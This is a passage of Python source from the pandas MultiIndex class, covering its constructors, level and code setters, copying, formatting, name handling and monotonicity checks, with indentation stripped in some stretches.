)
codes_length = len(codes[0])
for i, (level, level_codes) in enumerate(zip(levels, codes)):
if len(level_codes) != codes_length:
raise ValueError(
f"Unequal code lengths: {[len(code_) for code_ in codes]}"
)
if len(level_codes) and level_codes.max() >= len(level):
raise ValueError(
f"On level {i}, code max ({level_codes.max()}) >= length of "
f"level ({len(level)}). NOTE: this index is in an "
"inconsistent state"
)
if len(level_codes) and level_codes.min() < -1:
raise ValueError(f"On level {i}, code value ({level_codes.min()}) < -1")
if not level.is_unique:
raise ValueError(
f"Level values must be unique: {list(level)} on level {i}"
)
if self.sortorder is not None:
if self.sortorder > _lexsort_depth(self.codes, self.nlevels):
raise ValueError(
"Value for sortorder must be inferior or equal to actual "
f"lexsort_depth: sortorder {self.sortorder} "
f"with lexsort_depth {_lexsort_depth(self.codes, self.nlevels)}"
)
codes = [
self._validate_codes(level, code) for level, code in zip(levels, codes)
]
new_codes = FrozenList(codes)
return new_codes
@classmethod
def from_arrays(cls, arrays, sortorder=None, names=lib.no_default) -> MultiIndex:
"""
Convert arrays to MultiIndex.
Parameters
----------
arrays : list / sequence of array-likes
Each array-like gives one level's value for each data point.
len(arrays) is the number of levels.
sortorder : int or None
Level of sortedness (must be lexicographically sorted by that
level).
names : list / sequence of str, optional
Names for the levels in the index.
Returns
-------
MultiIndex
See Also
--------
MultiIndex.from_tuples : Convert list of tuples to MultiIndex.
MultiIndex.from_product : Make a MultiIndex from cartesian product
of iterables.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Examples
--------
>>> arrays = [[1, 1, 2, 2], ['red', 'blue', 'red', 'blue']]
>>> pd.MultiIndex.from_arrays(arrays, names=('number', 'color'))
MultiIndex([(1, 'red'),
(1, 'blue'),
(2, 'red'),
(2, 'blue')],
names=['number', 'color'])
"""
error_msg = "Input must be a list / sequence of array-likes."
if not is_list_like(arrays):
raise TypeError(error_msg)
elif is_iterator(arrays):
arrays = list(arrays)
# Check if elements of array are list-like
for array in arrays:
if not is_list_like(array):
raise TypeError(error_msg)
# Check if lengths of all arrays are equal or not,
# raise ValueError, if not
for i in range(1, len(arrays)):
if len(arrays[i]) != len(arrays[i - 1]):
raise ValueError("all arrays must be same length")
codes, levels = factorize_from_iterables(arrays)
if names is lib.no_default:
names = [getattr(arr, "name", None) for arr in arrays]
return cls(
levels=levels,
codes=codes,
sortorder=sortorder,
names=names,
verify_integrity=False,
)
@classmethod
@names_compat
def from_tuples(
cls,
tuples: Iterable[tuple[Hashable, ...]],
sortorder: int | None = None,
names: Sequence[Hashable] | None = None,
) -> MultiIndex:
"""
Convert list of tuples to MultiIndex.
Parameters
----------
tuples : list / sequence of tuple-likes
Each tuple is the index of one row/column.
sortorder : int or None
Level of sortedness (must be lexicographically sorted by that
level).
names : list / sequence of str, optional
Names for the levels in the index.
Returns
-------
MultiIndex
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_product : Make a MultiIndex from cartesian product
of iterables.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Examples
--------
>>> tuples = [(1, 'red'), (1, 'blue'),
... (2, 'red'), (2, 'blue')]
>>> pd.MultiIndex.from_tuples(tuples, names=('number', 'color'))
MultiIndex([(1, 'red'),
(1, 'blue'),
(2, 'red'),
(2, 'blue')],
names=['number', 'color'])
"""
if not is_list_like(tuples):
raise TypeError("Input must be a list / sequence of tuple-likes.")
elif is_iterator(tuples):
tuples = list(tuples)
tuples = cast(Collection[Tuple[Hashable, ...]], tuples)
arrays: list[Sequence[Hashable]]
if len(tuples) == 0:
if names is None:
raise TypeError("Cannot infer number of levels from empty list")
arrays = [[]] * len(names)
elif isinstance(tuples, (np.ndarray, Index)):
if isinstance(tuples, Index):
tuples = np.asarray(tuples._values)
arrays = list(lib.tuples_to_object_array(tuples).T)
elif isinstance(tuples, list):
arrays = list(lib.to_object_array_tuples(tuples).T)
else:
arrs = zip(*tuples)
arrays = cast(List[Sequence[Hashable]], arrs)
return cls.from_arrays(arrays, sortorder=sortorder, names=names)
@classmethod
def from_product(
cls, iterables, sortorder=None, names=lib.no_default
) -> MultiIndex:
"""
Make a MultiIndex from the cartesian product of multiple iterables.
Parameters
----------
iterables : list / sequence of iterables
Each iterable has unique labels for each level of the index.
sortorder : int or None
Level of sortedness (must be lexicographically sorted by that
level).
names : list / sequence of str, optional
Names for the levels in the index.
.. versionchanged:: 1.0.0
If not explicitly provided, names will be inferred from the
elements of iterables if an element has a name attribute
Returns
-------
MultiIndex
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_tuples : Convert list of tuples to MultiIndex.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Examples
--------
>>> numbers = [0, 1, 2]
>>> colors = ['green', 'purple']
>>> pd.MultiIndex.from_product([numbers, colors],
... names=['number', 'color'])
MultiIndex([(0, 'green'),
(0, 'purple'),
(1, 'green'),
(1, 'purple'),
(2, 'green'),
(2, 'purple')],
names=['number', 'color'])
"""
from pandas.core.reshape.util import cartesian_product
if not is_list_like(iterables):
raise TypeError("Input must be a list / sequence of iterables.")
elif is_iterator(iterables):
iterables = list(iterables)
codes, levels = factorize_from_iterables(iterables)
if names is lib.no_default:
names = [getattr(it, "name", None) for it in iterables]
# codes are all ndarrays, so cartesian_product is lossless
codes = cartesian_product(codes)
return cls(levels, codes, sortorder=sortorder, names=names)
@classmethod
def from_frame(cls, df: DataFrame, sortorder=None, names=None) -> MultiIndex:
"""
Make a MultiIndex from a DataFrame.
Parameters
----------
df : DataFrame
DataFrame to be converted to MultiIndex.
sortorder : int, optional
Level of sortedness (must be lexicographically sorted by that
level).
names : list-like, optional
If no names are provided, use the column names, or tuple of column
names if the columns is a MultiIndex. If a sequence, overwrite
names with the given sequence.
Returns
-------
MultiIndex
The MultiIndex representation of the given DataFrame.
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_tuples : Convert list of tuples to MultiIndex.
MultiIndex.from_product : Make a MultiIndex from cartesian product
of iterables.
Examples
--------
>>> df = pd.DataFrame([['HI', 'Temp'], ['HI', 'Precip'],
... ['NJ', 'Temp'], ['NJ', 'Precip']],
... columns=['a', 'b'])
>>> df
a b
0 HI Temp
1 HI Precip
2 NJ Temp
3 NJ Precip
>>> pd.MultiIndex.from_frame(df)
MultiIndex([('HI', 'Temp'),
('HI', 'Precip'),
('NJ', 'Temp'),
('NJ', 'Precip')],
names=['a', 'b'])
Using explicit names, instead of the column names
>>> pd.MultiIndex.from_frame(df, names=['state', 'observation'])
MultiIndex([('HI', 'Temp'),
('HI', 'Precip'),
('NJ', 'Temp'),
('NJ', 'Precip')],
names=['state', 'observation'])
"""
if not isinstance(df, ABCDataFrame):
raise TypeError("Input must be a DataFrame")
column_names, columns = zip(*df.items())
names = column_names if names is None else names
return cls.from_arrays(columns, sortorder=sortorder, names=names)
# --------------------------------------------------------------------
@cache_readonly
def _values(self) -> np.ndarray:
# We override here, since our parent uses _data, which we don't use.
values = []
for i in range(self.nlevels):
vals = self._get_level_values(i)
if is_categorical_dtype(vals.dtype):
vals = cast("CategoricalIndex", vals)
vals = vals._data._internal_get_values()
if isinstance(vals.dtype, ExtensionDtype) or isinstance(
vals, (ABCDatetimeIndex, ABCTimedeltaIndex)
):
vals = vals.astype(object)
# error: Incompatible types in assignment (expression has type "ndarray",
# variable has type "Index")
vals = np.array(vals, copy=False) # type: ignore[assignment]
values.append(vals)
arr = lib.fast_zip(values)
return arr
@property
def values(self) -> np.ndarray:
return self._values
@property
def array(self):
"""
Raises a ValueError for `MultiIndex` because there's no single
array backing a MultiIndex.
Raises
------
ValueError
"""
raise ValueError(
"MultiIndex has no single backing array. Use "
"'MultiIndex.to_numpy()' to get a NumPy array of tuples."
)
@cache_readonly
def dtypes(self) -> Series:
"""
Return the dtypes as a Series for the underlying MultiIndex
"""
from pandas import Series
return Series(
{
f"level_{idx}" if level.name is None else level.name: level.dtype
for idx, level in enumerate(self.levels)
}
)
def __len__(self) -> int:
return len(self.codes[0])
# --------------------------------------------------------------------
# Levels Methods
@cache_readonly
def levels(self) -> FrozenList:
# Use cache_readonly to ensure that self.get_locs doesn't repeatedly
# create new IndexEngine
# https://github.com/pandas-dev/pandas/issues/31648
result = [x._rename(name=name) for x, name in zip(self._levels, self._names)]
for level in result:
# disallow midx.levels[0].name = "foo"
level._no_setting_name = True
return FrozenList(result)
    def _set_levels(
        self,
        levels,
        *,
        level=None,
        copy: bool = False,
        validate: bool = True,
        verify_integrity: bool = False,
    ) -> None:
        """
        Replace the stored levels in place.

        Parameters
        ----------
        levels : sequence of array-likes
            Replacement level values.
        level : sequence of int or level names, optional
            Positions to replace; ``None`` replaces all levels.
        copy : bool, default False
            Copy each new level when coercing it to an Index.
        validate : bool, default True
            Check that the lengths of ``levels``/``level`` are consistent.
        verify_integrity : bool, default False
            Re-check codes against the new levels and store the result.
        """
        # This is NOT part of the levels property because it should be
        # externally not allowed to set levels. User beware if you change
        # _levels directly
        if validate:
            if len(levels) == 0:
                raise ValueError("Must set non-zero number of levels.")
            if level is None and len(levels) != self.nlevels:
                raise ValueError("Length of levels must match number of levels.")
            if level is not None and len(levels) != len(level):
                raise ValueError("Length of levels must match length of level.")
        if level is None:
            # Replace every level wholesale.
            new_levels = FrozenList(
                ensure_index(lev, copy=copy)._view() for lev in levels
            )
        else:
            # Replace only the requested positions, keeping the rest.
            level_numbers = [self._get_level_number(lev) for lev in level]
            new_levels_list = list(self._levels)
            for lev_num, lev in zip(level_numbers, levels):
                new_levels_list[lev_num] = ensure_index(lev, copy=copy)._view()
            new_levels = FrozenList(new_levels_list)
        if verify_integrity:
            new_codes = self._verify_integrity(levels=new_levels)
            self._codes = new_codes
        # NOTE: names are captured *before* swapping in the new levels and
        # re-applied afterwards so the replacement levels carry them.
        names = self.names
        self._levels = new_levels
        if any(names):
            self._set_names(names)
        # Cached properties (e.g. ``levels``) are now stale.
        self._reset_cache()
    @deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "levels"])
    def set_levels(
        self, levels, level=None, inplace=None, verify_integrity: bool = True
    ):
        """
        Set new levels on MultiIndex. Defaults to returning new index.

        Parameters
        ----------
        levels : sequence or list of sequence
            New level(s) to apply.
        level : int, level name, or sequence of int/level names (default None)
            Level(s) to set (None for all levels).
        inplace : bool
            If True, mutates in place.

            .. deprecated:: 1.2.0
        verify_integrity : bool, default True
            If True, checks that levels and codes are compatible.

        Returns
        -------
        new index (of same type and class...etc) or None
            The same type as the caller or None if ``inplace=True``.

        Examples
        --------
        >>> idx = pd.MultiIndex.from_tuples(
        ...     [
        ...         (1, "one"),
        ...         (1, "two"),
        ...         (2, "one"),
        ...         (2, "two"),
        ...         (3, "one"),
        ...         (3, "two")
        ...     ],
        ...     names=["foo", "bar"]
        ... )
        >>> idx
        MultiIndex([(1, 'one'),
                    (1, 'two'),
                    (2, 'one'),
                    (2, 'two'),
                    (3, 'one'),
                    (3, 'two')],
                   names=['foo', 'bar'])

        >>> idx.set_levels([['a', 'b', 'c'], [1, 2]])
        MultiIndex([('a', 1),
                    ('a', 2),
                    ('b', 1),
                    ('b', 2),
                    ('c', 1),
                    ('c', 2)],
                   names=['foo', 'bar'])
        >>> idx.set_levels(['a', 'b', 'c'], level=0)
        MultiIndex([('a', 'one'),
                    ('a', 'two'),
                    ('b', 'one'),
                    ('b', 'two'),
                    ('c', 'one'),
                    ('c', 'two')],
                   names=['foo', 'bar'])
        >>> idx.set_levels(['a', 'b'], level='bar')
        MultiIndex([(1, 'a'),
                    (1, 'b'),
                    (2, 'a'),
                    (2, 'b'),
                    (3, 'a'),
                    (3, 'b')],
                   names=['foo', 'bar'])

        If any of the levels passed to ``set_levels()`` exceeds the
        existing length, all of the values from that argument will
        be stored in the MultiIndex levels, though the values will
        be truncated in the MultiIndex output.

        >>> idx.set_levels([['a', 'b', 'c'], [1, 2, 3, 4]], level=[0, 1])
        MultiIndex([('a', 1),
                    ('a', 2),
                    ('b', 1),
                    ('b', 2),
                    ('c', 1),
                    ('c', 2)],
                   names=['foo', 'bar'])
        >>> idx.set_levels([['a', 'b', 'c'], [1, 2, 3, 4]], level=[0, 1]).levels
        FrozenList([['a', 'b', 'c'], [1, 2, 3, 4]])
        """
        if inplace is not None:
            warnings.warn(
                "inplace is deprecated and will be removed in a future version.",
                FutureWarning,
                stacklevel=3,
            )
        else:
            inplace = False
        # Accept any list-like container (e.g. a generator) for the levels.
        if is_list_like(levels) and not isinstance(levels, Index):
            levels = list(levels)
        level, levels = _require_listlike(level, levels, "Levels")
        # Operate on self when inplace, otherwise on a shallow twin.
        if inplace:
            idx = self
        else:
            idx = self._view()
        idx._reset_identity()
        idx._set_levels(
            levels, level=level, validate=True, verify_integrity=verify_integrity
        )
        if not inplace:
            return idx
    @property
    def nlevels(self) -> int:
        """
        Integer number of levels in this MultiIndex.

        Examples
        --------
        >>> mi = pd.MultiIndex.from_arrays([['a'], ['b'], ['c']])
        >>> mi
        MultiIndex([('a', 'b', 'c')],
                   )
        >>> mi.nlevels
        3
        """
        return len(self._levels)
@property
def levshape(self) -> Shape:
"""
A tuple with the length of each level.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([['a'], ['b'], ['c']])
>>> mi
MultiIndex([('a', 'b', 'c')],
)
>>> mi.levshape
(1, 1, 1)
"""
return tuple(len(x) for x in self.levels)
# --------------------------------------------------------------------
# Codes Methods
    @property
    def codes(self):
        # Read-only view of the per-level integer code arrays; mutate only
        # through ``_set_codes`` / ``set_codes``.
        return self._codes
    def _set_codes(
        self,
        codes,
        *,
        level=None,
        copy: bool = False,
        validate: bool = True,
        verify_integrity: bool = False,
    ) -> None:
        """
        Replace the stored codes in place.

        Parameters
        ----------
        codes : sequence of array-likes
            Replacement integer codes.
        level : sequence of int or level names, optional
            Positions to replace; ``None`` replaces all levels' codes.
        copy : bool, default False
            Copy when coercing codes to the frozen representation.
        validate : bool, default True
            Check that ``codes``/``level`` lengths are consistent.
        verify_integrity : bool, default False
            Re-check the new codes against the levels before storing.
        """
        if validate:
            if level is None and len(codes) != self.nlevels:
                raise ValueError("Length of codes must match number of levels")
            if level is not None and len(codes) != len(level):
                raise ValueError("Length of codes must match length of levels.")
        if level is None:
            # Replace every level's codes wholesale.
            new_codes = FrozenList(
                _coerce_indexer_frozen(level_codes, lev, copy=copy).view()
                for lev, level_codes in zip(self._levels, codes)
            )
        else:
            # Replace only the requested positions, keeping the rest.
            level_numbers = [self._get_level_number(lev) for lev in level]
            new_codes_list = list(self._codes)
            for lev_num, level_codes in zip(level_numbers, codes):
                lev = self.levels[lev_num]
                new_codes_list[lev_num] = _coerce_indexer_frozen(
                    level_codes, lev, copy=copy
                )
            new_codes = FrozenList(new_codes_list)
        if verify_integrity:
            new_codes = self._verify_integrity(codes=new_codes)
        self._codes = new_codes
        # Cached derived values are now stale.
        self._reset_cache()
    @deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "codes"])
    def set_codes(self, codes, level=None, inplace=None, verify_integrity: bool = True):
        """
        Set new codes on MultiIndex. Defaults to returning new index.

        Parameters
        ----------
        codes : sequence or list of sequence
            New codes to apply.
        level : int, level name, or sequence of int/level names (default None)
            Level(s) to set (None for all levels).
        inplace : bool
            If True, mutates in place.

            .. deprecated:: 1.2.0
        verify_integrity : bool, default True
            If True, checks that levels and codes are compatible.

        Returns
        -------
        new index (of same type and class...etc) or None
            The same type as the caller or None if ``inplace=True``.

        Examples
        --------
        >>> idx = pd.MultiIndex.from_tuples(
        ...     [(1, "one"), (1, "two"), (2, "one"), (2, "two")], names=["foo", "bar"]
        ... )
        >>> idx
        MultiIndex([(1, 'one'),
                    (1, 'two'),
                    (2, 'one'),
                    (2, 'two')],
                   names=['foo', 'bar'])

        >>> idx.set_codes([[1, 0, 1, 0], [0, 0, 1, 1]])
        MultiIndex([(2, 'one'),
                    (1, 'one'),
                    (2, 'two'),
                    (1, 'two')],
                   names=['foo', 'bar'])
        >>> idx.set_codes([1, 0, 1, 0], level=0)
        MultiIndex([(2, 'one'),
                    (1, 'two'),
                    (2, 'one'),
                    (1, 'two')],
                   names=['foo', 'bar'])
        >>> idx.set_codes([0, 0, 1, 1], level='bar')
        MultiIndex([(1, 'one'),
                    (1, 'one'),
                    (2, 'two'),
                    (2, 'two')],
                   names=['foo', 'bar'])
        >>> idx.set_codes([[1, 0, 1, 0], [0, 0, 1, 1]], level=[0, 1])
        MultiIndex([(2, 'one'),
                    (1, 'one'),
                    (2, 'two'),
                    (1, 'two')],
                   names=['foo', 'bar'])
        """
        if inplace is not None:
            warnings.warn(
                "inplace is deprecated and will be removed in a future version.",
                FutureWarning,
                stacklevel=3,
            )
        else:
            inplace = False
        level, codes = _require_listlike(level, codes, "Codes")
        # Operate on self when inplace, otherwise on a shallow twin.
        if inplace:
            idx = self
        else:
            idx = self._view()
        idx._reset_identity()
        idx._set_codes(codes, level=level, verify_integrity=verify_integrity)
        if not inplace:
            return idx
# --------------------------------------------------------------------
# Index Internals
    @cache_readonly
    def _engine(self):
        # Build an engine that packs all level codes of one row into a single
        # integer key for fast hashing/lookup.
        # Calculate the number of bits needed to represent labels in each
        # level, as log2 of their sizes (including -1 for NaN):
        sizes = np.ceil(np.log2([len(level) + 1 for level in self.levels]))
        # Sum bit counts, starting from the _right_....
        lev_bits = np.cumsum(sizes[::-1])[::-1]
        # ... in order to obtain offsets such that sorting the combination of
        # shifted codes (one for each level, resulting in a unique integer) is
        # equivalent to sorting lexicographically the codes themselves. Notice
        # that each level needs to be shifted by the number of bits needed to
        # represent the _previous_ ones:
        offsets = np.concatenate([lev_bits[1:], [0]]).astype("uint64")
        # Check the total number of bits needed for our representation:
        if lev_bits[0] > 64:
            # The levels would overflow a 64 bit uint - use Python integers:
            return MultiIndexPyIntEngine(self.levels, self.codes, offsets)
        return MultiIndexUIntEngine(self.levels, self.codes, offsets)
    @property
    def _constructor(self) -> Callable[..., MultiIndex]:
        # Reconstruction goes through ``from_tuples`` rather than the class
        # itself, since __new__ expects levels/codes, not tuples.
        return type(self).from_tuples
@doc(Index._shallow_copy)
def _shallow_copy(self, values: np.ndarray, name=lib.no_default) -> MultiIndex:
names = name if name is not lib.no_default else self.names
return type(self).from_tuples(values, sortorder=None, names=names)
def _view(self) -> MultiIndex:
result = type(self)(
levels=self.levels,
codes=self.codes,
sortorder=self.sortorder,
names=self.names,
verify_integrity=False,
)
result._cache = self._cache.copy()
result._cache.pop("levels", None) # GH32669
return result
# --------------------------------------------------------------------
    def copy(
        self,
        names=None,
        dtype=None,
        levels=None,
        codes=None,
        deep=False,
        name=None,
    ):
        """
        Make a copy of this object. Names, dtype, levels and codes can be
        passed and will be set on new copy.

        Parameters
        ----------
        names : sequence, optional
        dtype : numpy dtype or pandas type, optional

            .. deprecated:: 1.2.0
        levels : sequence, optional

            .. deprecated:: 1.2.0
        codes : sequence, optional

            .. deprecated:: 1.2.0
        deep : bool, default False
        name : Label
            Kept for compatibility with 1-dimensional Index. Should not be used.

        Returns
        -------
        MultiIndex

        Notes
        -----
        In most cases, there should be no functional difference from using
        ``deep``, but if ``deep`` is passed it will attempt to deepcopy.
        This could be potentially expensive on large MultiIndex objects.
        """
        names = self._validate_names(name=name, names=names, deep=deep)
        if levels is not None:
            warnings.warn(
                "parameter levels is deprecated and will be removed in a future "
                "version. Use the set_levels method instead.",
                FutureWarning,
                stacklevel=2,
            )
        if codes is not None:
            warnings.warn(
                "parameter codes is deprecated and will be removed in a future "
                "version. Use the set_codes method instead.",
                FutureWarning,
                stacklevel=2,
            )
        if deep:
            from copy import deepcopy

            # Deep-copy only the components the caller did not override.
            if levels is None:
                levels = deepcopy(self.levels)
            if codes is None:
                codes = deepcopy(self.codes)
        levels = levels if levels is not None else self.levels
        codes = codes if codes is not None else self.codes
        new_index = type(self)(
            levels=levels,
            codes=codes,
            sortorder=self.sortorder,
            names=names,
            verify_integrity=False,
        )
        # Share the cache, minus the "levels" entry (GH32669).
        new_index._cache = self._cache.copy()
        new_index._cache.pop("levels", None)  # GH32669
        if dtype:
            warnings.warn(
                "parameter dtype is deprecated and will be removed in a future "
                "version. Use the astype method instead.",
                FutureWarning,
                stacklevel=2,
            )
            new_index = new_index.astype(dtype)
        return new_index
    def __array__(self, dtype=None) -> np.ndarray:
        """the array interface, return my values"""
        # ``dtype`` is part of the __array__ protocol signature; the tuple
        # array from ``values`` is returned as-is.
        return self.values
def view(self, cls=None):
"""this is defined as a copy with the same identity"""
result = self.copy()
result._id = self._id
return result
@doc(Index.__contains__)
def __contains__(self, key: Any) -> bool:
hash(key)
try:
self.get_loc(key)
return True
except (LookupError, TypeError, ValueError):
return False
    @cache_readonly
    def dtype(self) -> np.dtype:
        # A MultiIndex is materialized as tuples, i.e. object dtype.
        return np.dtype("O")
def _is_memory_usage_qualified(self) -> bool:
"""return a boolean if we need a qualified .info display"""
def f(level):
return "mixed" in level or "string" in level or "unicode" in level
return any(f(level) for level in self._inferred_type_levels)
    @doc(Index.memory_usage)
    def memory_usage(self, deep: bool = False) -> int:
        # we are overwriting our base class to avoid
        # computing .values here which could materialize
        # a tuple representation unnecessarily
        return self._nbytes(deep)
    @cache_readonly
    def nbytes(self) -> int:
        """return the number of bytes in the underlying data"""
        # Shallow (non-deep) byte count; see ``_nbytes``.
        return self._nbytes(False)
def _nbytes(self, deep: bool = False) -> int:
"""
return the number of bytes in the underlying data
deeply introspect the level data if deep=True
include the engine hashtable
*this is in internal routine*
"""
# for implementations with no useful getsizeof (PyPy)
objsize = 24
level_nbytes = sum(i.memory_usage(deep=deep) for i in self.levels)
label_nbytes = sum(i.nbytes for i in self.codes)
names_nbytes = sum(getsizeof(i, objsize) for i in self.names)
result = level_nbytes + label_nbytes + names_nbytes
# include our engine hashtable
result += self._engine.sizeof(deep=deep)
return result
# --------------------------------------------------------------------
# Rendering Methods
def _formatter_func(self, tup):
"""
Formats each item in tup according to its level's formatter function.
"""
formatter_funcs = [level._formatter_func for level in self.levels]
return tuple(func(val) for func, val in zip(formatter_funcs, tup))
    def _format_native_types(self, na_rep="nan", **kwargs):
        # Render each level to strings and rebuild; NaN entries (code == -1)
        # are remapped onto an appended ``na_rep`` slot per level.
        new_levels = []
        new_codes = []
        # go through the levels and format them
        for level, level_codes in zip(self.levels, self.codes):
            level_strs = level._format_native_types(na_rep=na_rep, **kwargs)
            # add nan values, if there are any
            mask = level_codes == -1
            if mask.any():
                nan_index = len(level_strs)
                # numpy 1.21 deprecated implicit string casting
                level_strs = level_strs.astype(str)
                level_strs = np.append(level_strs, na_rep)
                assert not level_codes.flags.writeable  # i.e. copy is needed
                level_codes = level_codes.copy()  # make writeable
                level_codes[mask] = nan_index
            new_levels.append(level_strs)
            new_codes.append(level_codes)
        if len(new_levels) == 1:
            # a single-level multi-index
            return Index(new_levels[0].take(new_codes[0]))._format_native_types()
        else:
            # reconstruct the multi-index
            mi = MultiIndex(
                levels=new_levels,
                codes=new_codes,
                names=self.names,
                sortorder=self.sortorder,
                verify_integrity=False,
            )
            return mi._values
    def format(
        self,
        name: bool | None = None,
        formatter: Callable | None = None,
        na_rep: str | None = None,
        names: bool = False,
        space: int = 2,
        sparsify=None,
        adjoin: bool = True,
    ) -> list:
        """
        Render the MultiIndex as a list of display strings.

        Parameters
        ----------
        name : bool, optional
            Legacy alias for ``names``; overrides it when given.
        formatter : callable, optional
            Per-value formatting function forwarded to each level.
        na_rep : str, optional
            Representation for missing values; per-level default otherwise.
        names : bool, default False
            Prepend each level's name to its column of values.
        space : int, default 2
            Column padding used when ``adjoin`` is True.
        sparsify : bool or sentinel, optional
            Blank out repeated values; defaults to the
            "display.multi_sparse" option.
        adjoin : bool, default True
            Join the per-level columns into single lines.
        """
        if name is not None:
            names = name
        if len(self) == 0:
            return []
        stringified_levels = []
        for lev, level_codes in zip(self.levels, self.codes):
            na = na_rep if na_rep is not None else _get_na_rep(lev.dtype.type)
            if len(lev) > 0:
                formatted = lev.take(level_codes).format(formatter=formatter)
                # we have some NA
                mask = level_codes == -1
                if mask.any():
                    formatted = np.array(formatted, dtype=object)
                    formatted[mask] = na
                    formatted = formatted.tolist()
            else:
                # weird all NA case
                formatted = [
                    pprint_thing(na if isna(x) else x, escape_chars=("\t", "\r", "\n"))
                    for x in algos.take_nd(lev._values, level_codes)
                ]
            stringified_levels.append(formatted)
        result_levels = []
        for lev, lev_name in zip(stringified_levels, self.names):
            level = []
            # Optionally lead each column with the level's name.
            if names:
                level.append(
                    pprint_thing(lev_name, escape_chars=("\t", "\r", "\n"))
                    if lev_name is not None
                    else ""
                )
            level.extend(np.array(lev, dtype=object))
            result_levels.append(level)
        if sparsify is None:
            sparsify = get_option("display.multi_sparse")
        if sparsify:
            sentinel = ""
            # GH3547 use value of sparsify as sentinel if it's "Falsey"
            assert isinstance(sparsify, bool) or sparsify is lib.no_default
            if sparsify in [False, lib.no_default]:
                sentinel = sparsify
            # little bit of a kludge job for #1217
            result_levels = sparsify_labels(
                result_levels, start=int(names), sentinel=sentinel
            )
        if adjoin:
            from pandas.io.formats.format import get_adjustment

            adj = get_adjustment()
            return adj.adjoin(space, *result_levels).split("\n")
        else:
            return result_levels
# --------------------------------------------------------------------
# Names Methods
    def _get_names(self) -> FrozenList:
        # Immutable snapshot of the level names; backs the ``names`` property.
        return FrozenList(self._names)
    def _set_names(self, names, *, level=None, validate: bool = True):
        """
        Set new names on index. Each name has to be a hashable type.

        Parameters
        ----------
        values : str or sequence
            name(s) to set
        level : int, level name, or sequence of int/level names (default None)
            If the index is a MultiIndex (hierarchical), level(s) to set (None
            for all levels). Otherwise level must be None
        validate : bool, default True
            validate that the names match level lengths

        Raises
        ------
        TypeError if each name is not hashable.

        Notes
        -----
        sets names on levels. WARNING: mutates!
        Note that you generally want to set this *after* changing levels, so
        that it only acts on copies
        """
        # GH 15110
        # Don't allow a single string for names in a MultiIndex
        if names is not None and not is_list_like(names):
            raise ValueError("Names should be list-like for a MultiIndex")
        names = list(names)
        if validate:
            if level is not None and len(names) != len(level):
                raise ValueError("Length of names must match length of level.")
            if level is None and len(names) != self.nlevels:
                raise ValueError(
                    "Length of names must match number of levels in MultiIndex."
                )
        if level is None:
            level = range(self.nlevels)
        else:
            level = [self._get_level_number(lev) for lev in level]
        # set the name
        for lev, name in zip(level, names):
            if name is not None:
                # GH 20527
                # All items in 'names' need to be hashable:
                if not is_hashable(name):
                    raise TypeError(
                        f"{type(self).__name__}.name must be a hashable type"
                    )
            # error: Cannot determine type of '__setitem__'
            self._names[lev] = name  # type: ignore[has-type]
        # If .levels has been accessed, the names in our cache will be stale.
        self._reset_cache()
names = property(
fset=_set_names,
fget=_get_names,
doc="""
Names of levels in MultiIndex.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays(
... [[1, 2], [3, 4], [5, 6]], names=['x', 'y', 'z'])
>>> mi
MultiIndex([(1, 3, 5),
(2, 4, 6)],
names=['x', 'y', 'z'])
>>> mi.names
FrozenList(['x', 'y', 'z'])
""",
)
# --------------------------------------------------------------------
    @doc(Index._get_grouper_for_level)
    def _get_grouper_for_level(self, mapper, *, level):
        indexer = self.codes[level]
        level_index = self.levels[level]
        if mapper is not None:
            # Handle group mapping function and return
            level_values = self.levels[level].take(indexer)
            grouper = level_values.map(mapper)
            return grouper, None, None
        # Factorize codes so group labels are dense (0..n-1) in sort order.
        codes, uniques = algos.factorize(indexer, sort=True)
        if len(uniques) > 0 and uniques[0] == -1:
            # Handle NAs: factorize only the non-NA codes, keep -1 for NA.
            mask = indexer != -1
            ok_codes, uniques = algos.factorize(indexer[mask], sort=True)
            codes = np.empty(len(indexer), dtype=indexer.dtype)
            codes[mask] = ok_codes
            codes[~mask] = -1
        if len(uniques) < len(level_index):
            # Remove unobserved levels from level_index
            level_index = level_index.take(uniques)
        else:
            # break references back to us so that setting the name
            # on the output of a groupby doesn't reflect back here.
            level_index = level_index.copy()
        if level_index._can_hold_na:
            grouper = level_index.take(codes, fill_value=True)
        else:
            grouper = level_index.take(codes)
        return grouper, codes, level_index
    @cache_readonly
    def inferred_type(self) -> str:
        # Rows are tuples of (potentially) heterogeneous values, so the
        # inferred type is always reported as "mixed".
        return "mixed"
    def _get_level_number(self, level) -> int:
        """
        Resolve ``level`` (a name or an integer, possibly negative) to a
        zero-based level position, raising on ambiguity or out-of-range.
        """
        count = self.names.count(level)
        if (count > 1) and not is_integer(level):
            # A duplicated name cannot identify a unique level.
            raise ValueError(
                f"The name {level} occurs multiple times, use a level number"
            )
        try:
            level = self.names.index(level)
        except ValueError as err:
            # Not a known name: treat as an integer position if possible.
            if not is_integer(level):
                raise KeyError(f"Level {level} not found") from err
            elif level < 0:
                level += self.nlevels
                if level < 0:
                    orig_level = level - self.nlevels
                    raise IndexError(
                        f"Too many levels: Index has only {self.nlevels} levels, "
                        f"{orig_level} is not a valid level number"
                    ) from err
            # Note: levels are zero-based
            elif level >= self.nlevels:
                raise IndexError(
                    f"Too many levels: Index has only {self.nlevels} levels, "
                    f"not {level + 1}"
                ) from err
        return level
    @property
    def _has_complex_internals(self) -> bool:
        # used to avoid libreduction code paths, which raise or require conversion
        return True
    @cache_readonly
    def is_monotonic_increasing(self) -> bool:
        """
        return if the index is monotonic increasing (only equal or
        increasing) values.
        """
        # A code of -1 marks a missing value; any NA makes the index
        # non-monotonic.
        if any(-1 in code for code in self.codes):
            return False
        if all(level.is_monotonic for level in self.levels):
            # If each level is sorted, we can operate on the codes directly. GH27495
            return libalgos.is_lexsorted(
                [x.astype("int64", copy=False) for x in self.codes]
            )
        # reversed() because lexsort() wants the most significant key last.
        values = [
            self._get_level_values(i)._values for i in reversed(range(len(self.levels)))
        ]
        try:
            sort_order = np.lexsort(values)
